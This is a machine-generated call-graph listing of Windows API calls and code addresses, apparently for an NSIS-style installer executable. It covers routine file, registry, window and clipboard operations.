4030a8 3550->3552 3553 405701 lstrlenW 3551->3553 3554 4066a5 17 API calls 3551->3554 3552->3514 3555 40572a 3553->3555 3556 40570f lstrlenW 3553->3556 3554->3553 3558 405730 SetWindowTextW 3555->3558 3559 40573d 3555->3559 3556->3552 3557 405721 lstrcatW 3556->3557 3557->3555 3558->3559 3559->3552 3560 405743 SendMessageW SendMessageW SendMessageW 3559->3560 3560->3552 3562 4035d1 3561->3562 3563 4034a7 3561->3563 3564 40302e 32 API calls 3562->3564 3578 4035f8 SetFilePointer 3563->3578 3571 4033a3 3564->3571 3566 4034b2 SetFilePointer 3570 4034d7 3566->3570 3567 4035e2 ReadFile 3567->3570 3569 40302e 32 API calls 3569->3570 3570->3567 3570->3569 3570->3571 3572 40620a WriteFile 3570->3572 3573 4035b2 SetFilePointer 3570->3573 3579 406bb0 3570->3579 3571->3538 3574 4061db ReadFile 3571->3574 3572->3570 3573->3562 3575 4033bc 3574->3575 3575->3531 3575->3538 3577 406228 3576->3577 3577->3537 3578->3566 3580 406bd5 3579->3580 3581 406bdd 3579->3581 3580->3570 3581->3580 3582 406c64 GlobalFree 3581->3582 3583 406c6d GlobalAlloc 3581->3583 3584 406ce4 GlobalAlloc 3581->3584 3585 406cdb GlobalFree 3581->3585 3582->3583 3583->3580 3583->3581 3584->3580 3584->3581 3585->3584 3586->3375 3588 404001 3587->3588 3608 4065af wsprintfW 3588->3608 3590 404072 3609 4040a6 3590->3609 3592 403da2 3592->3381 3593 404077 3593->3592 3594 4066a5 17 API calls 3593->3594 3594->3593 3612 4064d5 3595->3612 3598 403d73 3598->3377 3598->3378 3599 40656a RegQueryValueExW RegCloseKey 3599->3598 3600->3383 3616 404610 3601->3616 3603 4057e7 3604 404610 SendMessageW 3603->3604 3606 4057f9 OleUninitialize 3604->3606 3605 4057c0 3605->3603 3619 401389 3605->3619 3606->3412 3608->3590 3610 4066a5 17 API calls 3609->3610 3611 4040b4 SetWindowTextW 3610->3611 3611->3593 3613 4064e4 3612->3613 3614 4064e8 3613->3614 3615 4064ed RegOpenKeyExW 3613->3615 3614->3598 3614->3599 3615->3614 3617 404628 3616->3617 3618 404619 SendMessageW 3616->3618 3617->3605 3618->3617 3621 401390 3619->3621 3620 4013fe 3620->3605 3621->3620 3622 4013cb MulDiv SendMessageW 3621->3622 3622->3621 3623->3427 3625 405fff 3624->3625 3628 406011 3624->3628 3627 40600c CharNextW 3625->3627 3625->3628 3626 406035 3626->3430 3626->3431 3627->3626 3628->3626 3629 405f64 CharNextW 3628->3629 3629->3628 3631 4069b4 FindClose 3630->3631 3632 4069bf 3630->3632 3631->3632 3632->3437 3633->3458 3634->3458 3635->3456 3637 406304 GetShortPathNameW 3636->3637 3638 4062de 3636->3638 3640 406423 3637->3640 3641 406319 3637->3641 3663 406158 GetFileAttributesW CreateFileW 3638->3663 3640->3472 3641->3640 3643 406321 wsprintfA 3641->3643 3642 4062e8 CloseHandle GetShortPathNameW 3642->3640 3645 4062fc 3642->3645 3644 4066a5 17 API calls 3643->3644 3646 406349 3644->3646 3645->3637 3645->3640 3664 406158 GetFileAttributesW CreateFileW 3646->3664 3648 406356 3648->3640 3649 406365 GetFileSize GlobalAlloc 3648->3649 3650 406387 3649->3650 3651 40641c CloseHandle 3649->3651 3652 4061db ReadFile 3650->3652 3651->3640 3653 40638f 3652->3653 3653->3651 3665 4060bd lstrlenA 3653->3665 3656 4063a6 lstrcpyA 3659 4063c8 3656->3659 3657 4063ba 3658 4060bd 4 API calls 3657->3658 3658->3659 3660 4063ff SetFilePointer 3659->3660 3661 40620a WriteFile 3660->3661 3662 406415 GlobalFree 3661->3662 3662->3651 3663->3642 3664->3648 3666 4060fe lstrlenA 3665->3666 3667 406106 3666->3667 3668 4060d7 lstrcmpiA 3666->3668 3667->3656 3667->3657 3668->3667 3669 4060f5 CharNextA 3668->3669 3669->3666 3670 401941 3671 401943 3670->3671 3676 402da6 3671->3676 3677 402db2 3676->3677 3678 4066a5 17 API calls 3677->3678 3679 402dd3 3678->3679 3680 401948 3679->3680 3681 4068ef 5 API calls 3679->3681 3682 405d74 3680->3682 3681->3680 3683 40603f 18 API calls 3682->3683 3684 405d94 3683->3684 3685 405d9c DeleteFileW 3684->3685 3686 405db3 3684->3686 3690 401951 3685->3690 3687 405ed3 3686->3687 3718 406668 lstrcpynW 3686->3718 3687->3690 3694 40699e 2 API calls 3687->3694 3689 405dd9 3691 405dec 3689->3691 3692 405ddf lstrcatW 3689->3692 3693 405f83 2 API calls 3691->3693 3695 405df2 3692->3695 3693->3695 3697 405ef8 3694->3697 3696 405e02 lstrcatW 3695->3696 3698 405e0d lstrlenW FindFirstFileW 3695->3698 3696->3698 3697->3690 3699 405f37 3 API calls 3697->3699 3698->3687 3716 405e2f 3698->3716 3700 405f02 3699->3700 3702 405d2c 5 API calls 3700->3702 3701 405eb6 FindNextFileW 3705 405ecc FindClose 3701->3705 3701->3716 3704 405f0e 3702->3704 3706 405f12 3704->3706 3707 405f28 3704->3707 3705->3687 3706->3690 3710 4056ca 24 API calls 3706->3710 3709 4056ca 24 API calls 3707->3709 3709->3690 3712 405f1f 3710->3712 3711 405d74 60 API calls 3711->3716 3714 406428 36 API calls 3712->3714 3713 4056ca 24 API calls 3713->3701 3714->3690 3715 4056ca 24 API calls 3715->3716 3716->3701 3716->3711 3716->3713 3716->3715 3717 406428 36 API calls 3716->3717 3719 406668 lstrcpynW 3716->3719 3720 405d2c 3716->3720 3717->3716 3718->3689 3719->3716 3728 406133 GetFileAttributesW 3720->3728 3723 405d47 RemoveDirectoryW 3726 405d55 3723->3726 3724 405d4f DeleteFileW 3724->3726 3725 405d59 3725->3716 3726->3725 3727 405d65 SetFileAttributesW 3726->3727 3727->3725 3729 405d38 3728->3729 3730 406145 SetFileAttributesW 3728->3730 3729->3723 3729->3724 3729->3725 3730->3729 3731 4015c1 3732 402da6 17 API calls 3731->3732 3733 4015c8 3732->3733 3734 405fe2 4 API calls 3733->3734 3746 4015d1 3734->3746 3735 401631 3737 401663 3735->3737 3738 401636 3735->3738 3736 405f64 CharNextW 3736->3746 3741 401423 24 API calls 3737->3741 3750 401423 3738->3750 3747 40165b 3741->3747 3743 405c16 2 API calls 3743->3746 3744 405c33 5 API calls 3744->3746 3745 40164a SetCurrentDirectoryW 3745->3747 3746->3735 3746->3736 3746->3743 3746->3744 3748 401617 GetFileAttributesW 3746->3748 3749 405b99 4 API calls 3746->3749 3748->3746 3749->3746 3751 4056ca 24 API calls 3750->3751 3752 401431 3751->3752 3753 406668 lstrcpynW 3752->3753 3753->3745 3934 401c43 3956 402d84 3934->3956 3936 401c4a 3937 402d84 17 API calls 3936->3937 3938 401c57 3937->3938 3939 402da6 17 API calls 3938->3939 3940 401c6c 3938->3940 3939->3940 3941 401c7c 3940->3941 3942 402da6 17 API calls 3940->3942 3943 401cd3 3941->3943 3944 401c87 3941->3944 3942->3941 3946 402da6 17 API calls 3943->3946 3945 402d84 17 API calls 3944->3945 3948 401c8c 3945->3948 3947 401cd8 3946->3947 3949 402da6 17 API calls 3947->3949 3950 402d84 17 API calls 3948->3950 3951 401ce1 FindWindowExW 3949->3951 3952 401c98 3950->3952 3955 401d03 3951->3955 3953 401cc3 SendMessageW 3952->3953 3954 401ca5 SendMessageTimeoutW 3952->3954 3953->3955 3954->3955 3957 4066a5 17 API calls 3956->3957 3958 402d99 3957->3958 3958->3936 3966 4028c4 3967 4028ca 3966->3967 3968 4028d2 FindClose 3967->3968 3969 402c2a 3967->3969 3968->3969 3775 4040c5 3776 4040dd 3775->3776 3777 40423e 3775->3777 3776->3777 3778 4040e9 3776->3778 3779 40424f GetDlgItem GetDlgItem 3777->3779 3784 40428f 3777->3784 3781 4040f4 SetWindowPos 3778->3781 3782 404107 3778->3782 3851 4045c4 3779->3851 3780 4042e9 3785 404610 SendMessageW 3780->3785 3790 404239 3780->3790 3781->3782 3786 404110 ShowWindow 3782->3786 3787 404152 3782->3787 3784->3780 3789 401389 2 API calls 3784->3789 3816 4042fb 3785->3816 3791 404130 GetWindowLongW 3786->3791 3792 40422b 3786->3792 3793 404171 3787->3793 3794 40415a DestroyWindow 3787->3794 3788 404279 KiUserCallbackDispatcher 3795 40140b 2 API calls 3788->3795 3798 4042c1 3789->3798 3791->3792 3800 404149 ShowWindow 3791->3800 3857 40462b 3792->3857 3796 404176 SetWindowLongW 3793->3796 3797 404187 3793->3797 3801 40456e 3794->3801 3795->3784 3796->3790 3797->3792 3802 404193 GetDlgItem 3797->3802 3798->3780 3803 4042c5 SendMessageW 3798->3803 3800->3787 3801->3790 3808 40457e ShowWindow 3801->3808 3806 4041c1 3802->3806 3807 4041a4 SendMessageW IsWindowEnabled 3802->3807 3803->3790 3804 40140b 2 API calls 3804->3816 3805 40454f DestroyWindow EndDialog 3805->3801 3810 4041ce 3806->3810 3813 404215 SendMessageW 3806->3813 3814 4041e1 3806->3814 3822 4041c6 3806->3822 3807->3790 3807->3806 3808->3790 3809 4066a5 17 API calls 3809->3816 3810->3813 3810->3822 3812 4045c4 18 API calls 3812->3816 3813->3792 3817 4041e9 3814->3817 3818 4041fe 3814->3818 3815 4041fc 3815->3792 3816->3804 3816->3805 3816->3809 3816->3812 3823 4045c4 18 API calls 3816->3823 3820 40140b 2 API calls 3817->3820 3819 40140b 2 API calls 3818->3819 3821 404205 3819->3821 3820->3822 3821->3792 3821->3822 3854 40459d 3822->3854 3824 404376 GetDlgItem 3823->3824 3825 404393 ShowWindow EnableWindow 3824->3825 3826 40438b 3824->3826 3871 4045e6 EnableWindow 3825->3871 3826->3825 3828 4043bd EnableWindow 3833 4043d1 3828->3833 3829 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3830 404406 SendMessageW 3829->3830 3829->3833 3830->3833 3832 4040a6 18 API calls 3832->3833 3833->3829 3833->3832 3872 4045f9 SendMessageW 3833->3872 3873 406668 lstrcpynW 3833->3873 3835 404435 lstrlenW 3836 4066a5 17 API calls 3835->3836 3837 40444b SetWindowTextW 3836->3837 3838 401389 2 API calls 3837->3838 3839 40445c 3838->3839 3839->3790 3839->3816 3840 40448f DestroyWindow 3839->3840 3843 40448a 3839->3843 3840->3801 3841 4044a9 CreateDialogParamW 3840->3841 3841->3801 3842 4044dc 3841->3842 3844 4045c4 18 API calls 3842->3844 3843->3790 3845 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3844->3845 3846 401389 2 API calls 3845->3846 3847 40452d 3846->3847 3847->3790 3848 404535 ShowWindow 3847->3848 3849 404610 SendMessageW 3848->3849 3850 40454d 3849->3850 3850->3801 3852 4066a5 17 API calls 3851->3852 3853 4045cf SetDlgItemTextW 3852->3853 3853->3788 3855 4045a4 3854->3855 3856 4045aa SendMessageW 3854->3856 3855->3856 3856->3815 3858 4046ee 3857->3858 3859 404643 GetWindowLongW 3857->3859 3858->3790 3859->3858 3860 404658 3859->3860 3860->3858 3861 404685 GetSysColor 3860->3861 3862 404688 3860->3862 3861->3862 3863 404698 SetBkMode 3862->3863 3864 40468e SetTextColor 3862->3864 3865 4046b0 GetSysColor 3863->3865 3866 4046b6 3863->3866 3864->3863 3865->3866 3867 4046c7 3866->3867 3868 4046bd SetBkColor 3866->3868 3867->3858 3869 4046e1 CreateBrushIndirect 3867->3869 3870 4046da DeleteObject 3867->3870 3868->3867 3869->3858 3870->3869 3871->3828 3872->3833 3873->3835 3973 4016cc 3974 402da6 17 API calls 3973->3974 3975 4016d2 GetFullPathNameW 3974->3975 3976 4016ec 3975->3976 3982 40170e 3975->3982 3978 40699e 2 API calls 3976->3978 3976->3982 3977 401723 GetShortPathNameW 3979 402c2a 3977->3979 3980 4016fe 3978->3980 3980->3982 3983 406668 lstrcpynW 3980->3983 3982->3977 3982->3979 3983->3982 3984 401e4e GetDC 3985 402d84 17 API calls 3984->3985 3986 401e60 GetDeviceCaps MulDiv ReleaseDC 3985->3986 3987 402d84 17 API calls 3986->3987 3988 401e91 3987->3988 3989 4066a5 17 API calls 3988->3989 3990 401ece CreateFontIndirectW 3989->3990 3991 402638 3990->3991 3991->3991 3992 402950 3993 402da6 17 API calls 3992->3993 3995 40295c 3993->3995 3994 402972 3997 406133 2 API calls 3994->3997 3995->3994 3996 402da6 17 API calls 3995->3996 3996->3994 3998 402978 3997->3998 4020 406158 GetFileAttributesW CreateFileW 3998->4020 4000 402985 4001 402a3b 4000->4001 4002 4029a0 GlobalAlloc 4000->4002 4003 402a23 4000->4003 4004 402a42 DeleteFileW 4001->4004 4005 402a55 4001->4005 4002->4003 4006 4029b9 4002->4006 4007 403371 44 API calls 4003->4007 4004->4005 4021 4035f8 SetFilePointer 4006->4021 4009 402a30 CloseHandle 4007->4009 4009->4001 4010 4029bf 4011 4035e2 ReadFile 4010->4011 4012 4029c8 GlobalAlloc 4011->4012 4013 4029d8 4012->4013 4014 402a0c 4012->4014 4015 403371 44 API calls 4013->4015 4016 40620a WriteFile 4014->4016 4019 4029e5 4015->4019 4017 402a18 GlobalFree 4016->4017 4017->4003 4018 402a03 GlobalFree 4018->4014 4019->4018 4020->4000 4021->4010 4029 403cd5 4030 403ce0 4029->4030 4031 403ce4 4030->4031 4032 403ce7 GlobalAlloc 4030->4032 4032->4031 4033 401956 4034 402da6 17 API calls 4033->4034 4035 40195d lstrlenW 4034->4035 4036 402638 4035->4036 4037 4014d7 4038 402d84 17 API calls 4037->4038 4039 4014dd Sleep 4038->4039 4041 402c2a 4039->4041 4042 4020d8 4043 4020ea 4042->4043 4053 40219c 4042->4053 4044 402da6 17 API calls 4043->4044 4045 4020f1 4044->4045 4047 402da6 17 API calls 4045->4047 4046 401423 24 API calls 4051 4022f6 4046->4051 4048 4020fa 4047->4048 4049 402110 LoadLibraryExW 4048->4049 4050 402102 GetModuleHandleW 4048->4050 4052 402121 4049->4052 4049->4053 4050->4049 4050->4052 4062 406aa4 4052->4062 4053->4046 4056 402132 4059 401423 24 API calls 4056->4059 4060 402142 4056->4060 4057 40216b 4058 4056ca 24 API calls 4057->4058 4058->4060 4059->4060 4060->4051 4061 40218e FreeLibrary 4060->4061 4061->4051 4067 40668a WideCharToMultiByte 4062->4067 4064 406ac1 4065 406ac8 GetProcAddress 4064->4065 4066 40212c 4064->4066 4065->4066 4066->4056 4066->4057 4067->4064 4068 402b59 4069 402b60 4068->4069 4070 402bab 4068->4070 4072 402ba9 4069->4072 4074 402d84 17 API calls 4069->4074 4071 406a35 5 API calls 4070->4071 4073 402bb2 4071->4073 4075 402da6 17 API calls 4073->4075 4076 402b6e 4074->4076 4077 402bbb 4075->4077 4078 402d84 17 API calls 4076->4078 4077->4072 4079 402bbf IIDFromString 4077->4079 4081 402b7a 4078->4081 4079->4072 4080 402bce 4079->4080 4080->4072 4086 406668 lstrcpynW 4080->4086 4085 4065af wsprintfW 4081->4085 4084 402beb CoTaskMemFree 4084->4072 4085->4072 4086->4084 4087 402a5b 4088 402d84 17 API calls 4087->4088 4089 402a61 4088->4089 4090 402aa4 4089->4090 4091 402a88 4089->4091 4096 40292e 4089->4096 4093 402abe 4090->4093 4094 402aae 4090->4094 4092 402a8d 4091->4092 4100 402a9e 4091->4100 4101 406668 lstrcpynW 4092->4101 4095 4066a5 17 API calls 4093->4095 4097 402d84 17 API calls 4094->4097 4095->4100 4097->4100 4100->4096 4102 4065af wsprintfW 4100->4102 4101->4096 4102->4096 3887 40175c 3888 402da6 17 API calls 3887->3888 3889 401763 3888->3889 3890 406187 2 API calls 3889->3890 3891 40176a 3890->3891 3892 406187 2 API calls 3891->3892 3892->3891 4103 401d5d 4104 402d84 17 API calls 4103->4104 4105 401d6e SetWindowLongW 4104->4105 4106 402c2a 4105->4106 4107 4028de 4108 4028e6 4107->4108 4109 4028ea FindNextFileW 4108->4109 4111 4028fc 4108->4111 4110 402943 4109->4110 4109->4111 4113 406668 lstrcpynW 4110->4113 4113->4111 4114 406d5f 4120 406be3 4114->4120 4115 40754e 4116 406c64 GlobalFree 4117 406c6d GlobalAlloc 4116->4117 4117->4115 4117->4120 4118 406ce4 GlobalAlloc 4118->4115 4118->4120 4119 406cdb GlobalFree 4119->4118 4120->4115 4120->4116 4120->4117 4120->4118 4120->4119 4121 401563 4122 402ba4 4121->4122 4125 4065af wsprintfW 4122->4125 4124 402ba9 4125->4124 4126 401968 4127 402d84 17 API calls 4126->4127 4128 40196f 4127->4128 4129 402d84 17 API calls 4128->4129 4130 40197c 4129->4130 4131 402da6 17 API calls 4130->4131 4132 401993 lstrlenW 4131->4132 4134 4019a4 4132->4134 4133 4019e5 4134->4133 4138 406668 lstrcpynW 4134->4138 4136 4019d5 4136->4133 4137 4019da lstrlenW 4136->4137 4137->4133 4138->4136 4146 40166a 4147 402da6 17 API calls 4146->4147 4148 401670 4147->4148 4149 40699e 2 API calls 4148->4149 4150 401676 4149->4150 4151 402aeb 4152 402d84 17 API calls 4151->4152 4153 402af1 4152->4153 4154 4066a5 17 API calls 4153->4154 4155 40292e 4153->4155 4154->4155 4156 4026ec 4157 402d84 17 API calls 4156->4157 4158 4026fb 4157->4158 4159 402745 ReadFile 4158->4159 4160 4061db ReadFile 4158->4160 4162 402785 MultiByteToWideChar 4158->4162 4163 40283a 4158->4163 4165 4027ab SetFilePointer MultiByteToWideChar 4158->4165 4166 40284b 4158->4166 4168 402838 4158->4168 4169 406239 SetFilePointer 4158->4169 4159->4158 4159->4168 4160->4158 4162->4158 4178 4065af wsprintfW 4163->4178 4165->4158 4167 40286c SetFilePointer 4166->4167 4166->4168 4167->4168 4170 406255 4169->4170 4173 40626d 4169->4173 4171 4061db ReadFile 4170->4171 4172 406261 4171->4172 4172->4173 4174 406276 SetFilePointer 4172->4174 4175 40629e SetFilePointer 4172->4175 4173->4158 4174->4175 4176 406281 4174->4176 4175->4173 4177 40620a WriteFile 4176->4177 4177->4173 4178->4168 4179 404a6e 4180 404aa4 4179->4180 4181 404a7e 4179->4181 4183 40462b 8 API calls 4180->4183 4182 4045c4 18 API calls 4181->4182 4184 404a8b SetDlgItemTextW 4182->4184 4185 404ab0 4183->4185 4184->4180 3893 40176f 3894 402da6 17 API calls 3893->3894 3895 401776 3894->3895 3896 401796 3895->3896 3897 40179e 3895->3897 3932 406668 lstrcpynW 3896->3932 3933 406668 lstrcpynW 3897->3933 3900 40179c 3904 4068ef 5 API calls 3900->3904 3901 4017a9 3902 405f37 3 API calls 3901->3902 3903 4017af lstrcatW 3902->3903 3903->3900 3924 4017bb 3904->3924 3905 40699e 2 API calls 3905->3924 3906 406133 2 API calls 3906->3924 3908 4017cd CompareFileTime 3908->3924 3909 40188d 3911 4056ca 24 API calls 3909->3911 3910 401864 3912 4056ca 24 API calls 3910->3912 3920 401879 3910->3920 3913 401897 3911->3913 3912->3920 3914 403371 44 API calls 3913->3914 3915 4018aa 3914->3915 3916 4018be SetFileTime 3915->3916 3917 4018d0 FindCloseChangeNotification 3915->3917 3916->3917 3919 4018e1 3917->3919 3917->3920 3918 4066a5 17 API calls 3918->3924 3922 4018e6 3919->3922 3923 4018f9 3919->3923 3921 406668 lstrcpynW 3921->3924 3925 4066a5 17 API calls 3922->3925 3926 4066a5 17 API calls 3923->3926 3924->3905 3924->3906 3924->3908 3924->3909 3924->3910 3924->3918 3924->3921 3927 405cc8 MessageBoxIndirectW 3924->3927 3931 406158 GetFileAttributesW CreateFileW 3924->3931 3928 4018ee lstrcatW 3925->3928 3929 401901 3926->3929 3927->3924 3928->3929 3930 405cc8 MessageBoxIndirectW 3929->3930 3930->3920 3931->3924 3932->3900 3933->3901 4186 401a72 4187 402d84 17 API calls 4186->4187 4188 401a7b 4187->4188 4189 402d84 17 API calls 4188->4189 4190 401a20 4189->4190 4191 401573 4192 401583 ShowWindow 4191->4192 4193 40158c 4191->4193 4192->4193 4194 402c2a 4193->4194 4195 40159a ShowWindow 4193->4195 4195->4194 4196 4023f4 4197 402da6 17 API calls 4196->4197 4198 402403 4197->4198 4199 402da6 17 API calls 4198->4199 4200 40240c 4199->4200 4201 402da6 17 API calls 4200->4201 4202 402416 GetPrivateProfileStringW 4201->4202 4203 4014f5 SetForegroundWindow 4204 402c2a 4203->4204 4205 401ff6 4206 402da6 17 API calls 4205->4206 4207 401ffd 4206->4207 4208 40699e 2 API calls 4207->4208 4209 402003 4208->4209 4211 402014 4209->4211 4212 4065af wsprintfW 4209->4212 4212->4211 4213 401b77 4214 402da6 17 API calls 4213->4214 4215 401b7e 4214->4215 4216 402d84 17 API calls 4215->4216 4217 401b87 wsprintfW 4216->4217 4218 402c2a 4217->4218 4219 4046fa lstrcpynW lstrlenW 4220 40167b 4221 402da6 17 API calls 4220->4221 4222 401682 4221->4222 4223 402da6 17 API calls 4222->4223 4224 40168b 4223->4224 4225 402da6 17 API calls 4224->4225 4226 401694 MoveFileW 4225->4226 4227 4016a0 4226->4227 4228 4016a7 4226->4228 4230 401423 24 API calls 4227->4230 4229 40699e 2 API calls 4228->4229 4232 4022f6 4228->4232 4231 4016b6 4229->4231 4230->4232 4231->4232 4233 406428 36 API calls 4231->4233 4233->4227 4241 4019ff 4242 402da6 17 API calls 4241->4242 4243 401a06 4242->4243 4244 402da6 17 API calls 4243->4244 4245 401a0f 4244->4245 4246 401a16 lstrcmpiW 4245->4246 4247 401a28 lstrcmpW 4245->4247 4248 401a1c 4246->4248 4247->4248 4249 4022ff 4250 402da6 17 API calls 4249->4250 4251 402305 4250->4251 4252 402da6 17 API calls 4251->4252 4253 40230e 4252->4253 4254 402da6 17 API calls 4253->4254 4255 402317 4254->4255 4256 40699e 2 API calls 4255->4256 4257 402320 4256->4257 4258 402331 lstrlenW lstrlenW 4257->4258 4259 402324 4257->4259 4260 4056ca 24 API calls 4258->4260 4261 4056ca 24 API calls 4259->4261 4263 40232c 4259->4263 4262 40236f SHFileOperationW 4260->4262 4261->4263 4262->4259 4262->4263 4264 401000 4265 401037 BeginPaint GetClientRect 4264->4265 4266 40100c DefWindowProcW 4264->4266 4268 4010f3 4265->4268 4269 401179 4266->4269 4270 401073 CreateBrushIndirect FillRect DeleteObject 4268->4270 4271 4010fc 4268->4271 4270->4268 4272 401102 CreateFontIndirectW 4271->4272 4273 401167 EndPaint 4271->4273 4272->4273 4274 401112 6 API calls 4272->4274 4273->4269 4274->4273 4275 401d81 4276 401d94 GetDlgItem 4275->4276 4277 401d87 4275->4277 4280 401d8e 4276->4280 4278 402d84 17 API calls 4277->4278 4278->4280 4279 401dd5 GetClientRect LoadImageW SendMessageW 4283 401e33 4279->4283 4285 401e3f 4279->4285 4280->4279 4281 402da6 17 API calls 4280->4281 4281->4279 4284 401e38 DeleteObject 4283->4284 4283->4285 4284->4285 4286 401503 4287 40150b 4286->4287 4289 40151e 4286->4289 4288 402d84 17 API calls 4287->4288 4288->4289 4290 404783 4291 40479b 4290->4291 4295 4048b5 4290->4295 4296 4045c4 18 API calls 4291->4296 4292 40491f 4293 4049e9 4292->4293 4294 404929 GetDlgItem 4292->4294 4301 40462b 8 API calls 4293->4301 4297 404943 4294->4297 4298 4049aa 4294->4298 4295->4292 4295->4293 4299 4048f0 GetDlgItem SendMessageW 4295->4299 4300 404802 4296->4300 4297->4298 4306 404969 SendMessageW LoadCursorW SetCursor 4297->4306 4298->4293 4302 4049bc 4298->4302 4323 4045e6 EnableWindow 4299->4323 4304 4045c4 18 API calls 4300->4304 4305 4049e4 4301->4305 4307 4049d2 4302->4307 4308 4049c2 SendMessageW 4302->4308 4310 40480f CheckDlgButton 4304->4310 4327 404a32 4306->4327 4307->4305 4312 4049d8 SendMessageW 4307->4312 4308->4307 4309 40491a 4324 404a0e 4309->4324 4321 4045e6 EnableWindow 4310->4321 4312->4305 4316 40482d GetDlgItem 4322 4045f9 SendMessageW 4316->4322 4318 404843 SendMessageW 4319 404860 GetSysColor 4318->4319 4320 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4318->4320 4319->4320 4320->4305 4321->4316 4322->4318 4323->4309 4325 404a21 SendMessageW 4324->4325 4326 404a1c 4324->4326 4325->4292 4326->4325 4330 405c8e ShellExecuteExW 4327->4330 4329 404998 LoadCursorW SetCursor 4329->4298 4330->4329 4331 402383 4332 40238a 4331->4332 4335 40239d 4331->4335 4333 4066a5 17 API calls 4332->4333 4334 402397 4333->4334 4336 405cc8 MessageBoxIndirectW 4334->4336 4336->4335 4337 402c05 SendMessageW 4338 402c2a 4337->4338 4339 402c1f InvalidateRect 4337->4339 4339->4338 4340 405809 4341 4059b3 4340->4341 4342 40582a GetDlgItem GetDlgItem GetDlgItem 4340->4342 4344 4059e4 4341->4344 4345 4059bc GetDlgItem CreateThread CloseHandle 4341->4345 4385 4045f9 SendMessageW 4342->4385 4347 405a0f 4344->4347 4348 405a34 4344->4348 4349 4059fb ShowWindow ShowWindow 4344->4349 4345->4344 4346 40589a 4351 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4346->4351 4350 405a6f 4347->4350 4353 405a23 4347->4353 4354 405a49 ShowWindow 4347->4354 4355 40462b 8 API calls 4348->4355 4387 4045f9 SendMessageW 4349->4387 4350->4348 4360 405a7d SendMessageW 4350->4360 4358 4058f3 SendMessageW SendMessageW 4351->4358 4359 40590f 4351->4359 4361 40459d SendMessageW 4353->4361 4356 405a69 4354->4356 4357 405a5b 4354->4357 4366 405a42 4355->4366 4363 40459d SendMessageW 4356->4363 4362 4056ca 24 API calls 4357->4362 4358->4359 4364 405922 4359->4364 4365 405914 SendMessageW 4359->4365 4360->4366 4367 405a96 CreatePopupMenu 4360->4367 4361->4348 4362->4356 4363->4350 4369 4045c4 18 API calls 4364->4369 4365->4364 4368 4066a5 17 API calls 4367->4368 4370 405aa6 AppendMenuW 4368->4370 4371 405932 4369->4371 4372 405ac3 GetWindowRect 4370->4372 4373 405ad6 TrackPopupMenu 4370->4373 4374 40593b ShowWindow 4371->4374 4375 40596f GetDlgItem SendMessageW 4371->4375 4372->4373 4373->4366 4377 405af1 4373->4377 4378 405951 ShowWindow 4374->4378 4379 40595e 4374->4379 4375->4366 4376 405996 SendMessageW SendMessageW 4375->4376 4376->4366 4380 405b0d SendMessageW 4377->4380 4378->4379 4386 4045f9 SendMessageW 4379->4386 4380->4380 4381 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4380->4381 4383 405b4f SendMessageW 4381->4383 4383->4383 4384 405b78 GlobalUnlock SetClipboardData CloseClipboard 4383->4384 4384->4366 4385->4346 4386->4375 4387->4347 4388 40248a 4389 402da6 17 API calls 4388->4389 4390 40249c 4389->4390 4391 402da6 17 API calls 4390->4391 4392 4024a6 4391->4392 4405 402e36 4392->4405 4395 40292e 4396 4024de 4398 4024ea 4396->4398 4400 402d84 17 API calls 4396->4400 4397 402da6 17 API calls 4399 4024d4 lstrlenW 4397->4399 4401 402509 RegSetValueExW 4398->4401 4403 403371 44 API calls 4398->4403 4399->4396 4400->4398 4402 40251f RegCloseKey 4401->4402 4402->4395 4403->4401 4406 402e51 4405->4406 4409 406503 4406->4409 4410 406512 4409->4410 4411 4024b6 4410->4411 4412 40651d RegCreateKeyExW 4410->4412 4411->4395 4411->4396 4411->4397 4412->4411 4413 404e0b 4414 404e37 4413->4414 4415 404e1b 4413->4415 4417 404e6a 4414->4417 4418 404e3d SHGetPathFromIDListW 4414->4418 4424 405cac GetDlgItemTextW 4415->4424 4419 404e54 SendMessageW 4418->4419 4420 404e4d 4418->4420 4419->4417 4422 40140b 2 API calls 4420->4422 4421 404e28 SendMessageW 4421->4414 4422->4419 4424->4421 4425 40290b 4426 402da6 17 API calls 4425->4426 4427 402912 FindFirstFileW 4426->4427 4428 40293a 4427->4428 4432 402925 4427->4432 4433 4065af wsprintfW 4428->4433 4430 402943 4434 406668 lstrcpynW 4430->4434 4433->4430 4434->4432 4435 40190c 4436 401943 4435->4436 4437 402da6 17 API calls 4436->4437 4438 401948 4437->4438 4439 405d74 67 API calls 4438->4439 4440 401951 4439->4440 4441 40190f 4442 402da6 17 API calls 4441->4442 4443 401916 4442->4443 4444 405cc8 MessageBoxIndirectW 4443->4444 4445 40191f 4444->4445 4446 401491 4447 4056ca 24 API calls 4446->4447 4448 401498 4447->4448 4449 402891 4450 402898 4449->4450 4451 402ba9 4449->4451 4452 402d84 17 API calls 4450->4452 4453 40289f 4452->4453 4454 4028ae SetFilePointer 4453->4454 4454->4451 4455 4028be 4454->4455 4457 4065af wsprintfW 4455->4457 4457->4451 4458 401f12 4459 402da6 17 API calls 4458->4459 4460 401f18 4459->4460 4461 402da6 17 API calls 4460->4461 4462 401f21 4461->4462 4463 402da6 17 API calls 4462->4463 4464 401f2a 4463->4464 4465 402da6 17 API calls 4464->4465 4466 401f33 4465->4466 4467 401423 24 API calls 4466->4467 4468 401f3a 4467->4468 4475 405c8e ShellExecuteExW 4468->4475 4470 401f82 4471 406ae0 5 API calls 4470->4471 4473 40292e 4470->4473 4472 401f9f CloseHandle 4471->4472 4472->4473 4475->4470 4476 402f93 4477 402fa5 SetTimer 4476->4477 4478 402fbe 4476->4478 4477->4478 4479 40300c 4478->4479 4480 403012 MulDiv 4478->4480 4481 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4480->4481 4481->4479 4497 401d17 4498 402d84 17 API calls 4497->4498 4499 401d1d IsWindow 4498->4499 4500 401a20 4499->4500 4501 401b9b 4502 401ba8 4501->4502 4503 401bec 4501->4503 4508 401bbf 4502->4508 4511 401c31 4502->4511 4504 401bf1 4503->4504 4505 401c16 GlobalAlloc 4503->4505 4509 40239d 4504->4509 4522 406668 lstrcpynW 4504->4522 4506 4066a5 17 API calls 4505->4506 4506->4511 4507 4066a5 17 API calls 4512 402397 4507->4512 4520 406668 lstrcpynW 4508->4520 4511->4507 4511->4509 4516 405cc8 MessageBoxIndirectW 